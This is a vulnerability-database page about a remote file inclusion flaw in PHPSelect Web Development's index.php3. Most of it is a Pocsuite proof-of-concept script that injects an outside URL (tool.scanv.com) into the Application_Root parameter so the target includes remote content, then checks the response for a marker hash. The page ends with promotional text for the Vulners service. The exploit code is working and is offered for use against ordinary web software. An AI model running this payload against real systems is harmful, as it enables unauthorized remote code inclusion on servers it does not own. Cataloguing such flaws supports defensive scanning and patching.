Lucene search
K

PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

PHPSelect Web Development Index.PHP3 Remote File Include Vulnerabilit

Code

                                                #!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class PHPSelect_Web_Development_Remote_File_Include(POCBase):
    vulID = '82263'
    version = '1'
    vulDate = '2006-09-27'
    author = ' '
    createDate = '2015-12-17'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-82263']
    name = 'PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'PHPSelect Web Development'
    appVersion = ' '
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/index.php3?Application_Root=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(PHPSelect_Web_Development_Remote_File_Include)
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
17